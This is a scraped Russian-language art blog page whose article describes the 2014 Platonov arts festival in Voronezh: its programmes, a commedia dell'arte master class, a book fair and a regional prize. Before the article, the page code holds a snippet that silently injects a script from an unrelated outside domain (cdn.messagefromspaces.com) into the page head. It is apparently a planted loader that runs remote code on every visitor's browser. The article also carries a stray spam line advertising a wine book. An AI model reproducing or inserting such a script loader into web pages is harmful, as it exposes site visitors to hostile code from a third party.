, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Платоновский фестиваль 2014: современное искусство Воронежа

Автор: Татьяна Науменко | 08 Июн 2014

С 2011 года в Воронеже ежегодно проходит Международный Платоновский фестиваль искусств. Мероприятие названо так в честь известного воронежца, популярного русского писателя двадцатого века Андрея Платонова. Платоновский фестиваль – это важнейший культурный проект, дающий возможность жителям Воронежской и других областей приобщиться к результатам творчества современного искусства. Поэтому фестиваль является частью новой эпохи в развитии культуры региона. Естественно, фестиваль патронирует и руководство области.

В мероприятии задействованы такие направления, как музыка, театр, изобразительное искусство и литература. Все события поделены на три программы. В «Основную программу» входят выдающиеся достижения современного искусства, получившие большую известность и высокую оценку со стороны профессиональных критиков. «Платоновская программа» - это непосредственно те произведения, которые созданы на основе литературного наследия Андрея Платонова. В «Программе актуального искусства» будут продемонстрированы различные творческие эксперименты, новшества. Весь фестиваль будет проходить под строгим наблюдением экспертов, в число которых входят ведущие деятели культуры и искусства.

В предыдущие годы здесь участвовали как уже известные солисты, так и молодые музыкальные коллективы. Активно выступали и молодые исполнители азиатских и европейских стран – некоторые из них были впервые в России.

В этот раз, например, будет проходить мастер-класс комедии дель-арте – это традиционный вид итальянской комедии масок. В нем будут задействованы артисты из известного миланского театра Piccolo Teatro di Milano – для участия в мастер-классе также приглашены и артисты воронежских театров вместе со студентами Академии искусств. То есть, фестиваль можно назвать довольно интересным мероприятием по обмену опытом между деятелями культуры разных стран и народов.

Шестого июня в пять часов вечера на Советской площади Воронежа начнется масштабная книжная ярмарка, которая будет работать до восьмого июня. На ярмарке можно будет приобрести уникальные книги независимых российских издательств по исключительно низкой стоимости. Ярмарка является частью литературной программы фестиваля.
подарочная книга о вине понравится Вам и имениннику.
Ежегодно проходит вручение специальной Платоновской премии, присуждаемой в области литературы и искусства. Премия достаточно престижная, ведь она учреждена региональным правительством.

Фестиваль популярен у жителей области и, конечно же, у самих воронежцев. С каждым годом на мероприятии увеличивается число гостей и из других российских городов. Подготавливает и проводит фестиваль особое автономное культурное учреждение области – это «Дирекция Международного Платоновского фестиваля».

Фестиваль пройдет в начале июня, с пятого по пятнадцатое числа. В эти дни ожидается благоприятная погода, поэтому различные события можно будет посмотреть и на открытом воздухе.

Приходите на Платоновский фестиваль 2014, приобщитесь к высокому искусству!

Темы: Арт Воронеж, Новости | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress